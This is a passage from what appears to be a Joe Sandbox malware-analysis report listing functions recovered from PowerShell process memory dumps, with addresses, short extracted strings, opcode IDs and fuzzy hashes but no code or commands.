Opcode ID: 7b035d6176c30bf540ed46b9681ecebae9173b304e24f73b58e0e5971e20118f
Instruction ID: c97f7029c660cb997a97e54866bb25fedbc722e1106749e42ef1feeede54c162
Opcode Fuzzy Hash: 7b035d6176c30bf540ed46b9681ecebae9173b304e24f73b58e0e5971e20118f
Instruction Fuzzy Hash: 90127834B002148FCB25DB24D854AAEB7F2BF89304F1481E9D949AB365DF35AD45CF91

Function 07921EB6 Relevance: 4.0, Strings: 3, Instructions: 243COMMON

Download Yara Rule

Strings

tLth, xrefs: 07922001
4'jq, xrefs: 079220F4
x.sh, xrefs: 07922237

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$tLth$x.sh
API String ID: 0-3593257027
Opcode ID: 2ce385c88cf7c917ce7e4ddf2fbc6164e465efef60af1d913cb198cd532c5d1a
Instruction ID: bd057fc937246a87a0db32c98ca3263941b43c9c73782edc44ce2be0ca14b30b
Opcode Fuzzy Hash: 2ce385c88cf7c917ce7e4ddf2fbc6164e465efef60af1d913cb198cd532c5d1a
Instruction Fuzzy Hash: 9591B0B0B00214DFCB14EF54C944BAEBBB6FB89308F558469E9056F359CB32D942DBA1

Function 04D5E228 Relevance: 3.2, Strings: 2, Instructions: 733COMMON

Download Yara Rule

Strings

LRjq, xrefs: 04D5E37D
(Xoq, xrefs: 04D5E45F

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: (Xoq$LRjq
API String ID: 0-3603458070
Opcode ID: f1ae89a2adfbc09a6bfce80c37eb6b7245a184c08b32b5356b526151969e6425
Instruction ID: 5f1413782608fe8f8a971c255136108e60112deb2de89c0658916e30e8d53984
Opcode Fuzzy Hash: f1ae89a2adfbc09a6bfce80c37eb6b7245a184c08b32b5356b526151969e6425
Instruction Fuzzy Hash: 4F626B34B00218CFDB14DB24D890B6DBBB6BF89300F1185A9D9469B3A5DB35EE85CF91

Function 04D5D1C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\V)m, xrefs: 04D5D382
\V)m, xrefs: 04D5D22F

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: \V)m$\V)m
API String ID: 0-2777142676
Opcode ID: 832976678367380d69d0c53920335d6ad5d9d3910dfc18abef95afd86d72a2af
Instruction ID: 4e14e27da5c080321feb08aa91349a9f87868188c7808a99395e6079c63d57c2
Opcode Fuzzy Hash: 832976678367380d69d0c53920335d6ad5d9d3910dfc18abef95afd86d72a2af
Instruction Fuzzy Hash: D6714F70E00209DFEF14DFA9D98579EBBF2BF48314F14C529D815A7264EB74A841CBA1

Function 04D5D1B4 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

\V)m, xrefs: 04D5D382
\V)m, xrefs: 04D5D22F

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: \V)m$\V)m
API String ID: 0-2777142676
Opcode ID: 2e05c69a228ad9bdf6990c74a81abc9633093f27f8ae0e418dd789007e7b38dc
Instruction ID: a141f81c3b2455b3cb07222a34d986a0687cf20cb03b9d77c5592c990e30972d
Opcode Fuzzy Hash: 2e05c69a228ad9bdf6990c74a81abc9633093f27f8ae0e418dd789007e7b38dc
Instruction Fuzzy Hash: 6B712D70E00249DFEF10DFA9D98579EBBF2BF48314F14C529D815A7264EB74A441CBA1

Function 04D5E2C1 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

LRjq, xrefs: 04D5E37D
(Xoq, xrefs: 04D5E45F

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: (Xoq$LRjq
API String ID: 0-3603458070
Opcode ID: 16ce6371936c60ec3f05c644da5624923e2ef3c24c2a5b7408d2220e27dd7272
Instruction ID: 81ea29968778a679871c73e4577a35b7dd98ac7684ddf77edcc3a36d87b1d18a
Opcode Fuzzy Hash: 16ce6371936c60ec3f05c644da5624923e2ef3c24c2a5b7408d2220e27dd7272
Instruction Fuzzy Hash: 27516E34B003188FDB24DF68D850B9DBBB6FF88310F1184A9D9459B3A5DB71AD85CB91

Function 04D59D40 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

I)m, xrefs: 04D59C44
h])m, xrefs: 04D59C18

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: h])m$I)m
API String ID: 0-27771872
Opcode ID: 684a386232a0968a39efb077428f8afbd5fb9d0fe245d1c48f9866f2bd3ee99d
Instruction ID: 195610f88c09cba6a584b1d107c2536657f914f9d4fe4bcac6977c4c723a609c
Opcode Fuzzy Hash: 684a386232a0968a39efb077428f8afbd5fb9d0fe245d1c48f9866f2bd3ee99d
Instruction Fuzzy Hash: F0312C34A011188FCB25DB64C8506EEB7F1BF49345F1044E9D90AAB265CB35AE46CF91

Function 04D5CB6C Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

\V)m, xrefs: 04D5CE2F

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: \V)m
API String ID: 0-3219898122
Opcode ID: e4fae6fb1c9471c8330c02c6d78d4a9c759fb7883148afea85cf3aa643fc606c
Instruction ID: 60cc995e06d1fcfa0476576becd282f542e4831eaef5cb4b18b4170175142b69
Opcode Fuzzy Hash: e4fae6fb1c9471c8330c02c6d78d4a9c759fb7883148afea85cf3aa643fc606c
Instruction Fuzzy Hash: DFB13A70E103099FDF10CFA9C9857ADBBF2BF48B14F148529E815EB264EB74A845CB91

Function 04D5AFFE Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

$jq, xrefs: 04D5B07C

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: $jq
API String ID: 0-2886413773
Opcode ID: 2bbc3ea0ede73f9323aa8d508324d03ec246ba96075ff764fe9b61889c3fa7b9
Instruction ID: 0d878d4d57bb8beaac50381a8dc8b72bc2fb1fa2e76e1f10369dc3ad329b7072
Opcode Fuzzy Hash: 2bbc3ea0ede73f9323aa8d508324d03ec246ba96075ff764fe9b61889c3fa7b9
Instruction Fuzzy Hash: 035115B1D00308DFDB14DF9AC884ADEBFB5BF48710F24812AD405AB264DB75A949CF91

Function 04D5B008 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

$jq, xrefs: 04D5B07C

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: $jq
API String ID: 0-2886413773
Opcode ID: bab63f8d161ee2eb19e650ed92cdf9149b15df73713b5a9e9c8706ea71faeb57
Instruction ID: d4253a503ee983b09d706c58710733de8ed067e282bf0e79319f369d5b7b3766
Opcode Fuzzy Hash: bab63f8d161ee2eb19e650ed92cdf9149b15df73713b5a9e9c8706ea71faeb57
Instruction Fuzzy Hash: 7E5104B1D00308DBDB10DF9AC884ADEBBB5BF48310F24812AE405AB264DB756945CF90

Function 04D54098 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822b603ee927c48b75767a41ce17bdcfc76c3b7517d0de3cb66318da77dfad38
Instruction ID: 984eb6115565e5a60e855177da1b7cc8e8d08dd03799496c8c634869d7bb51a5
Opcode Fuzzy Hash: 822b603ee927c48b75767a41ce17bdcfc76c3b7517d0de3cb66318da77dfad38
Instruction Fuzzy Hash: 2DF12934A002199FDF15CF98D584AAEBBF2FF88314F248559E805AB365CB35ED81CB91

Function 04D53870 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a203eba9b2518b1ac5e604346be294bc6664cc9ec4db9dfd7547d971f85366d9
Instruction ID: e998f5843c06815d4b9b4ca48825a68883a30d9dfb04c7f1a58c9ae7f9507902
Opcode Fuzzy Hash: a203eba9b2518b1ac5e604346be294bc6664cc9ec4db9dfd7547d971f85366d9
Instruction Fuzzy Hash: 4FD10674A00219AFDF05DF98D584AADFBB2FF88350F258159E845AB365CB31ED81CB90

Function 04D5D43E Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f10589c98a393a660bbc98d990ea95c1280b6154a47319358515abdbf5f40f7
Instruction ID: bcaa6941381109b6226e182d15c13e19616bd4da93827d9fa422a7928272d73e
Opcode Fuzzy Hash: 9f10589c98a393a660bbc98d990ea95c1280b6154a47319358515abdbf5f40f7
Instruction Fuzzy Hash: 48B13B70E00219CFDF10CFA9D98579DBBF2BF49314F248529D815EB264EB74A885CBA1

Function 04D52FF0 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0468b42ff6f62f0fee95fc0e6e33e883ab9cd3287c5c486e0403dd7ad8d84f55
Instruction ID: 6647165e0efc17d638672eba474fcd080f2752c68c42dde3a6ca259b30d3f969
Opcode Fuzzy Hash: 0468b42ff6f62f0fee95fc0e6e33e883ab9cd3287c5c486e0403dd7ad8d84f55
Instruction Fuzzy Hash: C3A18C70A006058FCB05CF9DC5949AEBBF6FF88310B2485A9D815AB3A5DB35FC41CBA0

Function 07921AD8 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 326370dc27824000f571b30271aae3ae5767cfc2a4f1c739e80f9c7cd7327d78
Instruction ID: 99b219d2e5f91275d778737f67be2c2a9d69c9aea1d800bdb972dba70fc7182a
Opcode Fuzzy Hash: 326370dc27824000f571b30271aae3ae5767cfc2a4f1c739e80f9c7cd7327d78
Instruction Fuzzy Hash: EE918EB4A40218DFCB14DF58C554AAABBF6EF89314F14C469E805AF359CB32DC42DBA1

Function 07921ABE Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bb9bb490ed95dc0425646c4cb7252b195eb694975ad34295b7e1dc49c55a5d2
Instruction ID: b380e67add3c983aa2f0b427233c1b609581271501f72c62fd836849697b8323
Opcode Fuzzy Hash: 3bb9bb490ed95dc0425646c4cb7252b195eb694975ad34295b7e1dc49c55a5d2
Instruction Fuzzy Hash: 52916EB4A00219DFCB14DF58C594A99BBF2FF89318F14C49AD8056B359C732D892DBA0

Function 079215FA Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33209887d5eb229a0111b7b56c8ca01148932a1e264a52d0e725b5083c412e18
Instruction ID: c1d6077e5dc19df5d2d33294b23969847a36f87d1fc10be67a2bd2ffbb3b6174
Opcode Fuzzy Hash: 33209887d5eb229a0111b7b56c8ca01148932a1e264a52d0e725b5083c412e18
Instruction Fuzzy Hash: 244176B0B402199FCB10AF648950B7D7BE69FC6308F4884A9D900DB395DA36DD92C7F1

Function 04D543E1 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e74fa791830dbc44dcbb6e725f2f98f5ad626fbe5e15388f49553d56af06ab49
Instruction ID: 53e66abb2fef9facf5337ebab2dbd7ae34a0fc03247324fee8908123ebcf069a
Opcode Fuzzy Hash: e74fa791830dbc44dcbb6e725f2f98f5ad626fbe5e15388f49553d56af06ab49
Instruction Fuzzy Hash: C6512834A00209EFDF05CF98D584A9DBBB6FF88314F248558E804AB365CB75EC86CB91

Function 04D5406A Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2235a728b4bf62017bdd5086adcd6738b655c01aea2cbbbfe3ddb17cc9e163ac
Instruction ID: e0216e95644459964e11f4efb223e994f1f732a22bf727287e4bfc5aa8ebe1d3
Opcode Fuzzy Hash: 2235a728b4bf62017bdd5086adcd6738b655c01aea2cbbbfe3ddb17cc9e163ac
Instruction Fuzzy Hash: 95419F74A002448FCB15CF5CC894EAABBF1FF99310B248659D855EB3A6D731EC81CB90

Function 04D53100 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdcf88e5c0bbfa1ded31d9df0496ef80c1022bc5ac39aab6032ef39ea5bb164f
Instruction ID: ccae917446d628762a2f9bccda40ac1b18c5ee56868b0d36ca65ddacf927e181
Opcode Fuzzy Hash: fdcf88e5c0bbfa1ded31d9df0496ef80c1022bc5ac39aab6032ef39ea5bb164f
Instruction Fuzzy Hash: 59414774A006099FCB09CF99C598DAEFBB1FF48314B118559D815AB364CB32FD91CBA0

Function 04D53860 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ffeabef43c9c28b6752d92aad1d7530e29e682fdec79738a8c9690aedce75cb
Instruction ID: 35f1163101f4f4d143b749889d10cabfb1003f4f704219e9e1c3a2082bedbd85
Opcode Fuzzy Hash: 9ffeabef43c9c28b6752d92aad1d7530e29e682fdec79738a8c9690aedce75cb
Instruction Fuzzy Hash: 16319274A042459FCB06DF58C8909AABFB1FF4A314B15819AD845EB362C735EC42CBA1

Function 04D5AC8E Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335c14a1488311576c80294e1ae7e369b68f134f5aa07bdc62a30b90dddfd3a5
Instruction ID: c98e6c2f6321808031caa05ec7dd02a43d4a76ddb5dadbc98213c1fa7609a663
Opcode Fuzzy Hash: 335c14a1488311576c80294e1ae7e369b68f134f5aa07bdc62a30b90dddfd3a5
Instruction Fuzzy Hash: 994110B1D003489FDB14DFA9C580ADEBFB5FF48314F10802AE809AB224DB75A985CB90

Function 04D5AC98 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce93f4d2e5cd66d3da250ea5e76c605e8cd54208355eb7ddeec6a8d644ecdc4d
Instruction ID: 49618ed5f361a473d9eba00f92e9545c20986a9247dd4b6a0ee7c9baa86d535b
Opcode Fuzzy Hash: ce93f4d2e5cd66d3da250ea5e76c605e8cd54208355eb7ddeec6a8d644ecdc4d
Instruction Fuzzy Hash: 8741EFB0D003489FDB14DFA9C584ADEBFB5FF48314F14802AE809AB264DB75A945CF90

Function 04D54565 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd2b0869fe683a93c4cda9306922a0b2169cfd39c1c0c5aba05dcfb7037b8254
Instruction ID: b9934b4646928f8868e18834e1a8ce91b38211af7b4af5f8e9f0295aa3c0e245
Opcode Fuzzy Hash: cd2b0869fe683a93c4cda9306922a0b2169cfd39c1c0c5aba05dcfb7037b8254
Instruction Fuzzy Hash: 15218E34A00208AFCF05CFA8D884E9DBBB6FF88314F248055E845AB375CB71E882CB51

Function 04D54500 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb50223816cf8617457964ea969615f12bfff7015eab7bd1469d5871e6d3c3af
Instruction ID: e7dd22e83cab7d96a2296a826748920fc3804f74cc87ba8d69db52a3fd9f4c31
Opcode Fuzzy Hash: cb50223816cf8617457964ea969615f12bfff7015eab7bd1469d5871e6d3c3af
Instruction Fuzzy Hash: C1110A34A00209EFDF05CF98D484E9DBBB2FF48314F288054E805AB365CB71E882CB41

Function 04D5CE63 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac91bd7fdfebc95f7483979b1b79738af223a01525107d0d4cbb7720cf96a1cc
Instruction ID: b22fe9d650a3fe3741e2cebce88124fa95331c1ebe1061616fd8c8746fa9000b
Opcode Fuzzy Hash: ac91bd7fdfebc95f7483979b1b79738af223a01525107d0d4cbb7720cf96a1cc
Instruction Fuzzy Hash: B011B070D20248DFEF24EAA4D9987ECB7B2BB5571DF14142AC801B61B0EF756889CB16

Function 033FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2146279188.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa62d6dbf5764951fa1b11faba9085d3c2901af5d9a57f01fa848a3f7ab729c
Instruction ID: 0ccdee3541f1062235dbb8b460d6c75d44a9a3796b0ff9862bf42bc235a68987
Opcode Fuzzy Hash: 8fa62d6dbf5764951fa1b11faba9085d3c2901af5d9a57f01fa848a3f7ab729c
Instruction Fuzzy Hash: 1D01DF31004341AFE720CA29CDC8B66BF9CEF46320F18C46AEE480B24AC27D9841CAB1

Function 033FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2146279188.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f15dc8b9189344adfe37a33ddb63a2b51795cbd0b86f4eff1af5a3b2c3d7210
Instruction ID: 96b95cbe7e107e5f3362fabb2042f29bf8e538a728bb96a0de27deb7e4982e7d
Opcode Fuzzy Hash: 0f15dc8b9189344adfe37a33ddb63a2b51795cbd0b86f4eff1af5a3b2c3d7210
Instruction Fuzzy Hash: B4012D7100E3C09FD7128B258D94A52BFB8EF47224F1D84DBD9888F2A7C2695849C772

Function 04D549E7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b181296c18e74a6fc1ccdfd8a243eb4faeae6b519bc6b3dacc1354a080c6df8
Instruction ID: 7891e4444d965c862c6edd013f79a2c149fe9ae48df80f4d9ce52252e8d63b21
Opcode Fuzzy Hash: 8b181296c18e74a6fc1ccdfd8a243eb4faeae6b519bc6b3dacc1354a080c6df8
Instruction Fuzzy Hash: 9DF09031A00108EFCB14CF98D8849AEF775FF88320B248659D819A7690CB36AC52CB51

Function 04D5ED71 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c261b7dfd4b6cf50c7e8b0de3a9da280c28ab14d1cb6edc17c2688b0ec900d7
Instruction ID: 57b243f977841329f5e2320b507ba42c5a2f81550b218f0f07be2bc9fef8a2c9
Opcode Fuzzy Hash: 8c261b7dfd4b6cf50c7e8b0de3a9da280c28ab14d1cb6edc17c2688b0ec900d7
Instruction Fuzzy Hash: 05E0EDB4D042099F8F44EFF994421BEBBF0AB88200B10887B9869E7340E73956118FD5

Function 04D5ED80 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a764974084b31877da36572974a574e28e863836bec7fff32f6b89d70547a742
Instruction ID: b7644eba9185c19b5e3a90cb02f2f3d868d21bff1c3e1edd20be7e01a55f73ab
Opcode Fuzzy Hash: a764974084b31877da36572974a574e28e863836bec7fff32f6b89d70547a742
Instruction Fuzzy Hash: 38E026B4E1520E9F8F48EFB995421BEFBF5AB48200F1085AFD819E3340E63456118F95

Function 04D5ED40 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90b6773015c3c9785c59656cd5b67906b38a86a4ba560f2c1d2195adab9f282
Instruction ID: 18266cd6223bea86ecfeec45cc96ae68768904bbc93ca679b77bc1cef2f178d3
Opcode Fuzzy Hash: b90b6773015c3c9785c59656cd5b67906b38a86a4ba560f2c1d2195adab9f282
Instruction Fuzzy Hash: 23D0126190D3449FFB2123A0A00DB643F687FC5305F484193E9AB940A3AB2FE855DAD1

Non-executed Functions

Function 04D5C830 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\V)m, xrefs: 04D5CA7B

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: \V)m
API String ID: 0-3219898122
Opcode ID: 74cdea48ea6dfbde98f767d37a0b737ca6df6e211fc98bc9c27f7e0a60aa6011
Instruction ID: 0951bade5f82e12a00fc6da25141c9b0260df3f9c0ab3e88c52efa40334a563a
Opcode Fuzzy Hash: 74cdea48ea6dfbde98f767d37a0b737ca6df6e211fc98bc9c27f7e0a60aa6011
Instruction Fuzzy Hash: C4916D71E103099FDF14CFA9C98179DBBF2BF88714F148529E805EB264EB74A845CB81

Function 07920E90 Relevance: 14.0, Strings: 11, Instructions: 295COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07920F2A
4'jq, xrefs: 079210C0
$jq, xrefs: 07920EE3
$jq, xrefs: 07920F0B
$jq, xrefs: 0792109F
`Bth, xrefs: 079211C3
4'jq, xrefs: 079210CC
$jq, xrefs: 07921077
$jq, xrefs: 07921093
$jq, xrefs: 07920EFF
4'jq, xrefs: 07920F36

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$`Bth$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-2600365
Opcode ID: 726af6766dc8712ad89ab89fcfb2120dcfc9f878729856055cb934cb82473495
Instruction ID: 9e93538beddb27da708f3fa465f7cae40aadec48107ad823553e84ff0de108d5
Opcode Fuzzy Hash: 726af6766dc8712ad89ab89fcfb2120dcfc9f878729856055cb934cb82473495
Instruction Fuzzy Hash: 66A15F71784359DFCB15AB6888106AABBBAEFC1314F24846FD804CB24ADA31C957D791

Function 07922D7A Relevance: 6.6, Strings: 5, Instructions: 327COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07922F34
4'jq, xrefs: 07922F40
tLth, xrefs: 07922E41
x.sh, xrefs: 07923077
h2uh, xrefs: 0792314D

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$h2uh$tLth$x.sh
API String ID: 0-1395400759
Opcode ID: c988a1eb89bb68bee1e707bdbf6211149a14ad844065e6deaa96f5d926062373
Instruction ID: dfb378a3d69cde76fcf9a15af716097e925a84ada7c4b096bacd7b048caf3faa
Opcode Fuzzy Hash: c988a1eb89bb68bee1e707bdbf6211149a14ad844065e6deaa96f5d926062373
Instruction Fuzzy Hash: B8C11AB0B402149FDB10EB68C550BAEBBE6EF84308F558469E8015F359CB76DC46DBA2

Function 07921860 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

$jq, xrefs: 079218B0
tPjq, xrefs: 07921914
$jq, xrefs: 079218CF
$jq, xrefs: 07921894
$jq, xrefs: 07921878

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

